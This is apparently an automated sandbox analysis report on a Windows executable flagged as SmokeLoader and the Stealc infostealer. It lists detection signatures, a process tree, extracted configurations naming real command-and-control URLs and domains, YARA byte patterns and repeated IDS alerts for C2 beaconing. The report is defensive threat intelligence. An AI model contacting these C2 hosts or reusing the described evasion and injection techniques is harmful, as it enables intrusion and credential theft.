Edit tour

Windows Analysis Report
oZB7n3wuNk.exe

Overview

General Information

Sample name:	oZB7n3wuNk.exe renamed because original name is a hash value
Original sample name:	a4bc249dc997df25a0e709eee0a0df87.exe
Analysis ID:	1502739
MD5:	a4bc249dc997df25a0e709eee0a0df87
SHA1:	d4bd3dcc3c5c1bed477f3eccbf1561b4c4f9180b
SHA256:	f691d08d4d08a092f52d63eb5a5fce0cbdeeaa042c18282c73ac5ebb627c25d3
Tags:	exe
Infos:

Detection

CryptOne, SmokeLoader, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected CryptOne packer

Yara detected Powershell download and execute

Yara detected SmokeLoader

Yara detected Stealc

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

oZB7n3wuNk.exe (PID: 2996 cmdline: "C:\Users\user\Desktop\oZB7n3wuNk.exe" MD5: A4BC249DC997DF25A0E709EEE0A0DF87)

explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

9A25.exe (PID: 3500 cmdline: C:\Users\user\AppData\Local\Temp\9A25.exe MD5: 17D51083CCB2B20074B1DC2CAC5BEA36)

svchost015.exe (PID: 6812 cmdline: C:\Users\user\AppData\Local\Temp\svchost015.exe MD5: B826DD92D78EA2526E465A34324EBEEA)

WerFault.exe (PID: 5372 cmdline: C:\Windows\system32\WerFault.exe -u -p 4004 -s 9264 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

birajci (PID: 6596 cmdline: C:\Users\user\AppData\Roaming\birajci MD5: A4BC249DC997DF25A0E709EEE0A0DF87)

explorer.exe (PID: 4016 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://epohe.ru/tmp/", "http://olihonols.in.net/tmp/", "http://nicetolosv.xyz/tmp/", "http://jftolsa.ws/tmp/"]}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\svchost015.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\svchost015.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Crypt	Yara detected CryptOne packer	Joe Security
00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x127b2:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12c3a:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2404360688.0000000000670000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: explorer.exe PID: 4004	ironshell_php	Semi-Auto-generated - file ironshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1d2718:$s2: ~ Shell I
Process Memory Space: 9A25.exe PID: 3500	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 9A25.exe PID: 3500	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost015.exe PID: 6812	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost015.exe PID: 6812	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.0.svchost015.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.0.svchost015.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\birajci, CommandLine: C:\Users\user\AppData\Roaming\birajci, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\birajci, NewProcessName: C:\Users\user\AppData\Roaming\birajci, OriginalFileName: C:\Users\user\AppData\Roaming\birajci, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\birajci, ProcessId: 6596, ProcessName: birajci

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:56.464489+0200
SID:	2039103
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:56.464489+0200
SID:	2851815
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:38.270691+0200
SID:	2039103
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:38.270691+0200
SID:	2851815
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:12.689150+0200
SID:	2039103
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:04.584929+0200
SID:	2039103
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:41.705004+0200
SID:	2039103
Severity:	1
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:41.705004+0200
SID:	2851815
Severity:	1
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:09.644123+0200
SID:	2039103
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:09.644123+0200
SID:	2851815
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:51.830169+0200
SID:	2039103
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:44.470379+0200
SID:	2039103
Severity:	1
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:44.470379+0200
SID:	2851815
Severity:	1
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:40.547489+0200
SID:	2039103
Severity:	1
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:40.547489+0200
SID:	2851815
Severity:	1
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:00.505655+0200
SID:	2039103
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:46.136287+0200
SID:	2039103
Severity:	1
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:18.914730+0200
SID:	2039103
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:03.300496+0200
SID:	2039103
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:03.300496+0200
SID:	2851815
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:39.421290+0200
SID:	2039103
Severity:	1
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.6 - Destination IP: 91.202.233.158

Timestamp:	2024-09-02T08:21:23.383253+0200
SID:	2044243
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:59.249947+0200
SID:	2039103
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:23.479496+0200
SID:	2039103
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:07.154202+0200
SID:	2039103
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:07.154202+0200
SID:	2851815
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:08.487207+0200
SID:	2039103
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:20.102228+0200
SID:	2039103
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:20.102228+0200
SID:	2851815
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.6 - Destination IP: 84.32.84.152

Timestamp:	2024-09-02T08:21:13.363565+0200
SID:	2019714
Severity:	2
Source Port:	49744
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:53.004797+0200
SID:	2039103
Severity:	1
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:55.344856+0200
SID:	2039103
Severity:	1
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:17.770363+0200
SID:	2039103
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:50.182098+0200
SID:	2039103
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:42.946482+0200
SID:	2039103
Severity:	1
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:42.946482+0200
SID:	2851815
Severity:	1
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:49.004934+0200
SID:	2039103
Severity:	1
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:20:57.633019+0200
SID:	2039103
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:11.300474+0200
SID:	2039103
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:22.026288+0200
SID:	2039103
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:22.026288+0200
SID:	2851815
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:05.996542+0200
SID:	2039103
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.6 - Destination IP: 2.185.214.11

Timestamp:	2024-09-02T08:21:01.659763+0200
SID:	2039103
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://91.202.233.158/e96ea2db21fa9a1b.phpF	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpZ	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpO	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php	Avira URL Cloud: Label: malware
Source: http://91.202.233.158	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php6	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php4	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpws	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/ws	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php5d1ef941bc7800	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php"}
Source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://epohe.ru/tmp/", "http://olihonols.in.net/tmp/", "http://nicetolosv.xyz/tmp/", "http://jftolsa.ws/tmp/"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\9A25.exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Roaming\birajci	ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: oZB7n3wuNk.exe	ReversingLabs: Detection: 63%
Source: oZB7n3wuNk.exe	Virustotal: Detection: 63%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\birajci

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: oZB7n3wuNk.exe

Joe Sandbox ML: detected

Source: oZB7n3wuNk.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 84.32.84.152:443 -> 192.168.2.6:49744 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49723 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49718 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49718 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49725 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49722 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49719 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49719 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49724 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49730 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49717 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49729 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49716 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49716 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49720 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49720 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49731 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49735 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49735 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49722 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49728 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49733 -> 2.185.214.11:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49736 -> 2.185.214.11:80
